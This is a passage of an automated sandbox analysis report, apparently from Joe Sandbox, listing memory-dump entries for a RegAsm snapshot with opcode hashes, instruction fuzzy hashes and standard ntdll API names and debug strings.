                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a18caa23febb458625ede48f86a3045002c5ce8476bb7cdfe59ceff882a5c539
                                                  • Instruction ID: e4afe629a93db0858e8acc4d1a73c17549db9271336bed6ad70a9a6bad273f80
                                                  • Opcode Fuzzy Hash: a18caa23febb458625ede48f86a3045002c5ce8476bb7cdfe59ceff882a5c539
                                                  • Instruction Fuzzy Hash: 00F0903D9126F49FD7218F58C848B6277D49B08728F08496ADC6DC7601C768D8C4C651
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ab2e3ec3f068b98f655d73619b9705d3af93f207198f08085d7bae6f3e66b22
                                                  • Instruction ID: afd76bbdd11eb463222d8def6db8df8979d47a513c29cae4d82b5e030eb42c10
                                                  • Opcode Fuzzy Hash: 6ab2e3ec3f068b98f655d73619b9705d3af93f207198f08085d7bae6f3e66b22
                                                  • Instruction Fuzzy Hash: DEF027AA8196C85ACB226B38A4907A17F9D9783214F191889CCA057200CBB988D3CA24
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                  • Instruction ID: 89e34db406f7ef319ad3c97a8a029d2fcd6a567c415d021a30b10de2d8fdce4e
                                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                  • Instruction Fuzzy Hash: 0BE0923A3006002BDB129E5D8CC4F57776E9FC2B10F080079B9049E252CAE69C1986A5
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0e7b5635db56afe5275a534e428d580319fa842450212069d5bddec28f2de6e
                                                  • Instruction ID: 651054d3d5b5311d57dd998b830d5c31b8eb5597aba0ec31a579d89a2c8b1747
                                                  • Opcode Fuzzy Hash: e0e7b5635db56afe5275a534e428d580319fa842450212069d5bddec28f2de6e
                                                  • Instruction Fuzzy Hash: BF900279B0540806E15071984424747000587D0301F55C011A2038654D8B959B6976B2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eaa3d8a531d9dc0cf6a0aefc30f77b3a3fd81c62ac3e5a982943eddf9a66326d
                                                  • Instruction ID: 920861c62c2c05c0cc9145ea29ac34c59f0c6b5782a4263a1eedc007a1ce21b4
                                                  • Opcode Fuzzy Hash: eaa3d8a531d9dc0cf6a0aefc30f77b3a3fd81c62ac3e5a982943eddf9a66326d
                                                  • Instruction Fuzzy Hash: 4D90027970544846E14071984414A47001587D0305F55C011A2078694D9A659E69B672
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b2b3ae42e6796bdca0099608435fd17005ce10b47370c916b0a0506133b23ef
                                                  • Instruction ID: 0eddc9fafcc45029bdfddbeb56042fa1926c5793a430deb28515385e6e7f6ebb
                                                  • Opcode Fuzzy Hash: 0b2b3ae42e6796bdca0099608435fd17005ce10b47370c916b0a0506133b23ef
                                                  • Instruction Fuzzy Hash: 8990027970140806E1807198441464B000587D1301F95C015A2039654DCE559B6D77B2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9267600da6bc8c8e83c3f0033931f819bf35d05f77de19e7acd99ccd625b6ae
                                                  • Instruction ID: 10daf7ea2d90b97196ad8b39d71504e5957b0588e26c50c7091378724b48f9d5
                                                  • Opcode Fuzzy Hash: d9267600da6bc8c8e83c3f0033931f819bf35d05f77de19e7acd99ccd625b6ae
                                                  • Instruction Fuzzy Hash: 94900269B0140506E10171984414617000A87D0241F95C022A3038555ECE659AA6A132
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a77e19f0e842321f93625b584905dcc192ee9e761569e01476812ac21c7741de
                                                  • Instruction ID: a5d216df25be2060f122eda15224145e510b60282c2c565c2b384ef0e99e12ff
                                                  • Opcode Fuzzy Hash: a77e19f0e842321f93625b584905dcc192ee9e761569e01476812ac21c7741de
                                                  • Instruction Fuzzy Hash: 459002B970140406E14071984414747000587D0301F55C011A7078554E8A999EE96676
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a5be780132d16cbf419561481b37cda15451a16be24e7fc3bea5e503d1b975f
                                                  • Instruction ID: d95cb51b166c026411e68796043344629be445a6e61978b5069cc0ed497c8cb5
                                                  • Opcode Fuzzy Hash: 9a5be780132d16cbf419561481b37cda15451a16be24e7fc3bea5e503d1b975f
                                                  • Instruction Fuzzy Hash: F69002A970180407E14075984814607000587D0302F55C011A3078555E8E699D656136
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 047d43ef5bb427f64592b4e9761cc74acf7f9a710ca6b822c2e5ac7255ec60cc
                                                  • Instruction ID: 7f99287fe968331ea6cd07ebe1acb58dc47c2f472f5ca828abdbb17ae1c6d217
                                                  • Opcode Fuzzy Hash: 047d43ef5bb427f64592b4e9761cc74acf7f9a710ca6b822c2e5ac7255ec60cc
                                                  • Instruction Fuzzy Hash: 2D90026970140406E102719844246070009C7D1345F95C012E3438555D8A659A67A133
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0912e31b1dd9ae3baa76512eb1947fdb6d03a9978d357fb60551fa734b60c7a
                                                  • Instruction ID: 7ac0c7fc4897ff73fc8c80a6031a57250d74b2f403a63ea905542013da93c34d
                                                  • Opcode Fuzzy Hash: e0912e31b1dd9ae3baa76512eb1947fdb6d03a9978d357fb60551fa734b60c7a
                                                  • Instruction Fuzzy Hash: 2890027970180406E1007198482470B000587D0302F55C011A3178555D8A6599656572
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a991b66270c2b8af1e3123cb12770c21c2c9a8ebecb0c90a4d3bea7fef65501
                                                  • Instruction ID: b83d21c9cc97ecb84e96f48878bcf73e94bf28757cc27424e13ec81d1caac0fb
                                                  • Opcode Fuzzy Hash: 5a991b66270c2b8af1e3123cb12770c21c2c9a8ebecb0c90a4d3bea7fef65501
                                                  • Instruction Fuzzy Hash: 0A90027970180406E10071984818747000587D0302F55C011A7178555E8AA5D9A56532
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8fb3faed1d592730ca920430a20550c7f4fb49f69949b93939586ca2ec2e7a25
                                                  • Instruction ID: f6da3b65c2a1767deb0b4e0e9ad9c213e77db5381bb5f4856d9169e7da038532
                                                  • Opcode Fuzzy Hash: 8fb3faed1d592730ca920430a20550c7f4fb49f69949b93939586ca2ec2e7a25
                                                  • Instruction Fuzzy Hash: 69900269B0140046514071A888549074005ABE1211755C121A29AC550D899999795676
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e46074b4f68296440add261768c8f332df8c21e0f2316d06a9436dae48c89b62
                                                  • Instruction ID: 2304840d65ab7ae63a0f70e5bee476ca75ec09e7863a10d61b2a337569bcdf52
                                                  • Opcode Fuzzy Hash: e46074b4f68296440add261768c8f332df8c21e0f2316d06a9436dae48c89b62
                                                  • Instruction Fuzzy Hash: 5D900269711C0046E20075A84C24B07000587D0303F55C115A2168554CCD5599755532
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4473d81f9084d9c5e9461f73572188f702c87c776434e6469314f7863f2e9b25
                                                  • Instruction ID: a9b9da89c94680a8293e8c3a940e0f30a11b5fab2ef876adfadd458cf8cbd27f
                                                  • Opcode Fuzzy Hash: 4473d81f9084d9c5e9461f73572188f702c87c776434e6469314f7863f2e9b25
                                                  • Instruction Fuzzy Hash: 3B9002A974140446E10071984424B070005C7E1301F55C015E3078554D8A59DD666137
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b17d40e708df844cf7e83388e79a431cb9b6dc8a8601289c2cb3da6a76effaf
                                                  • Instruction ID: a4bfca0e171eb4e907392bccd5e0e35225d98ed3ede60d2611d4dacb6cd11eeb
                                                  • Opcode Fuzzy Hash: 5b17d40e708df844cf7e83388e79a431cb9b6dc8a8601289c2cb3da6a76effaf
                                                  • Instruction Fuzzy Hash: 199002A971140046E10471984414707004587E1201F55C012A3168554CC9699D755136
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 318531a7ecba9645c7fff9b5f4de5d9a32ab3b7d3a490b3789600e4c839daf6f
                                                  • Instruction ID: 8fb932fde0ca36ffb2a0fdc9fe32cf2db77a78f2b552e0f30394aaa53031d4b9
                                                  • Opcode Fuzzy Hash: 318531a7ecba9645c7fff9b5f4de5d9a32ab3b7d3a490b3789600e4c839daf6f
                                                  • Instruction Fuzzy Hash: F390027970140406E10075D85418647000587E0301F55D011A7038555ECAA599A56132
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1fdbc591dbc97288fa806434bfe8f6e191b0cebd0d41baba9aec74214f447a6
                                                  • Instruction ID: 21cc4214ea89a5ceadfc3105e46fbcbb5ae4017b0902ef285437aaae0a786102
                                                  • Opcode Fuzzy Hash: b1fdbc591dbc97288fa806434bfe8f6e191b0cebd0d41baba9aec74214f447a6
                                                  • Instruction Fuzzy Hash: DD900269B0540406E14071985428707001587D0201F55D011A2038554DCA999B6966B2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b576f0516dd4571258e2da8e7b43dcb4227d4654ec05fb606badab5ccb9fffcf
                                                  • Instruction ID: b4405b42e63103831c5269e8230328c65635d1146c69d72d044e94e478bdc4db
                                                  • Opcode Fuzzy Hash: b576f0516dd4571258e2da8e7b43dcb4227d4654ec05fb606badab5ccb9fffcf
                                                  • Instruction Fuzzy Hash: B290027970140407E10071985518707000587D0201F55D411A2438558DDA9699656132
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 142763205dfd429cab5040c969ebeb9f955ced45b82afe82dca34010bf49379e
                                                  • Instruction ID: c64b1adccf8d015e96ea5e3db127ee28a575d23e36ae7fc2e56898c079d9c17e
                                                  • Opcode Fuzzy Hash: 142763205dfd429cab5040c969ebeb9f955ced45b82afe82dca34010bf49379e
                                                  • Instruction Fuzzy Hash: 6990027970140846E10071984414B47000587E0301F55C016A2138654D8A55D9657532
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0c8611d2bce12e449d403707164feee5b0e23ed1eb4c119542f534a8cab705f
                                                  • Instruction ID: e134e812fc8b7be431d48d0b62ddfe67ae086322e8aab1ff26ed424bbb583c52
                                                  • Opcode Fuzzy Hash: f0c8611d2bce12e449d403707164feee5b0e23ed1eb4c119542f534a8cab705f
                                                  • Instruction Fuzzy Hash: DA90027974140406E14171984414607000997D0241F95C012A2438554E8A959B6AAA72
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a7556d05e39531877d6887b5c9641d319910d661d6e86fd11167a6178108c94
                                                  • Instruction ID: 70e042ade8484d63d35ce334229847e8ab40cb36a589ac79773aaa6d0d0f79ad
                                                  • Opcode Fuzzy Hash: 7a7556d05e39531877d6887b5c9641d319910d661d6e86fd11167a6178108c94
                                                  • Instruction Fuzzy Hash: EC900269742441566545B1984414507400697E0241795C012A3428950C8966A96AD632
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d52dcf2637f8815b2f1e3e74d0fee6b9cc4b5553e90b09267c9c25aff21120fd
                                                  • Instruction ID: 6af1084399bc2687f192008c29b8cf8a87ce61783382fe6d31592d40087274f9
                                                  • Opcode Fuzzy Hash: d52dcf2637f8815b2f1e3e74d0fee6b9cc4b5553e90b09267c9c25aff21120fd
                                                  • Instruction Fuzzy Hash: 1390026970544446E10075985418A07000587D0205F55D011A3078595DCA759965A132
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ca056ee40886c91eaad8ad1fea4d103c76aa2ff397375f724ed4a18cb50dd62
                                                  • Instruction ID: 80458c13739689d7b6c8015523bb078801913b44f281db710c4bfcd00dd54277
                                                  • Opcode Fuzzy Hash: 1ca056ee40886c91eaad8ad1fea4d103c76aa2ff397375f724ed4a18cb50dd62
                                                  • Instruction Fuzzy Hash: 6290026D71340006E1807198541860B000587D1202F95D415A2029558CCD55997D5332
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 088074ca358a4607356ed587b6203602f9d491f41fe6d7ba7d005adb7c20567a
                                                  • Instruction ID: 7a7533be4be8bde5a5eb6245f58ee7b55cda2cba255fcac28d3ec7a18b348072
                                                  • Opcode Fuzzy Hash: 088074ca358a4607356ed587b6203602f9d491f41fe6d7ba7d005adb7c20567a
                                                  • Instruction Fuzzy Hash: AC90026970140007E140719854286074005D7E1301F55D011E2428554CDD55996A5233
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbdbffbebea413f324f8ed6b0f374eb9b62a307bf7f95cece7990a58781c1a70
                                                  • Instruction ID: d8670fa1d30cc8d398926b5ceab309bdc7bae524695c3c9dcc8dbd4d5792c7a6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: 7194f2f84d351c3a7d0bb8c2ab88ac6e9d2a4930d8199dd3f7795bcf0509f9dd
                                                  • Instruction ID: 5879a352036e0831284cb2b73a4e7adad06271d6d9336e9c19c86077780dfe72
                                                  • Opcode Fuzzy Hash: 7194f2f84d351c3a7d0bb8c2ab88ac6e9d2a4930d8199dd3f7795bcf0509f9dd
                                                  • Instruction Fuzzy Hash: 2851E5BEA0011ABFDF14DF988890A7EF7B8BB48205714C169E8A9D3645D734DE40CBA0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: 7646420ee3151eacfd39fd86063a7e49f875223b138dc884b0573ac70b97e50c
                                                  • Instruction ID: b5dcb71be83f79cf27316211e0225865ca4973d48d1ac30f0bbc0f7c7c640d98
                                                  • Opcode Fuzzy Hash: 7646420ee3151eacfd39fd86063a7e49f875223b138dc884b0573ac70b97e50c
                                                  • Instruction Fuzzy Hash: 3051F879E00649AFDB30DF5CC8E497FB7FD9B44204B14846AE89AD7681DB74DA40CB60
                                                  Strings
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 028C4742
                                                  • Execute=1, xrefs: 028C4713
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 028C4787
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 028C4725
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 028C46FC
                                                  • ExecuteOptions, xrefs: 028C46A0
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 028C4655
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: 9b7aaeb014750103b3aa4e1086d7929562b45846ba7fd1b4cec0be5559e20699
                                                  • Instruction ID: e853a64d98027ea158391900335985d9e1418c0c36d7331cff497e6f07296a88
                                                  • Opcode Fuzzy Hash: 9b7aaeb014750103b3aa4e1086d7929562b45846ba7fd1b4cec0be5559e20699
                                                  • Instruction Fuzzy Hash: D351283DA4021D7AEF21FBA8DC95FA9B3B9AF04708F2400A9D509E7281E7709A45CF51
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction ID: 26e726e94b92fd5b016d6a0f8ccaae1c71e649e7874318c000dff6427407bf01
                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                  • Instruction Fuzzy Hash: 9D81CD7CA05249AFDF25CF68E8917FEBBA2AF4435CF1C4219E865E7291C731A840CB51
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$[$]:%u
                                                  • API String ID: 48624451-2819853543
                                                  • Opcode ID: a576997ff5918a14f32af37230af22f922f32b49048a0a199ec49d60c8080085
                                                  • Instruction ID: 84bb98788c509b218df5be4e753785f2e80051fbc4e862d7a899344790225aa2
                                                  • Opcode Fuzzy Hash: a576997ff5918a14f32af37230af22f922f32b49048a0a199ec49d60c8080085
                                                  • Instruction Fuzzy Hash: E821517AE0021DAFDB50DF79C894AAEBBFDAF44744F040126ED45E3240EB30D9018BA1
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 028C02E7
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 028C02BD
                                                  • RTL: Re-Waiting, xrefs: 028C031E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: df4269ab3542d7a0a3f987ed1b21769f5e0c20ab6a6297e14f101cb64c468705
                                                  • Instruction ID: c8bf0be64074750543de8a7cbe04bf9813c1163690bb8bf5bb542ad2ecd5777f
                                                  • Opcode Fuzzy Hash: df4269ab3542d7a0a3f987ed1b21769f5e0c20ab6a6297e14f101cb64c468705
                                                  • Instruction Fuzzy Hash: D7E1AB3C608741DFD725CF29C884B2AB7E1AB94358F240A5DF6A9CB6E1D774D844CB42
                                                  Strings
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 028C7B7F
                                                  • RTL: Resource at %p, xrefs: 028C7B8E
                                                  • RTL: Re-Waiting, xrefs: 028C7BAC
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: aa9c8cee8766695414dcd98bbd0c6d5fb3c9e9c9062097e577e0245b150cbdc7
                                                  • Instruction ID: bf353eb08b1ae857318092445794f5cbe58cc3e5b3afdb3e65bab8a6b1a73d42
                                                  • Opcode Fuzzy Hash: aa9c8cee8766695414dcd98bbd0c6d5fb3c9e9c9062097e577e0245b150cbdc7
                                                  • Instruction Fuzzy Hash: C241B03D7007029FD724EE29C840B6AB7E5EF89718F100A1DF95AD7A80DB71E8058F91
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 028C728C
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 028C72A3
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 028C7294
                                                  • RTL: Re-Waiting, xrefs: 028C72C1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
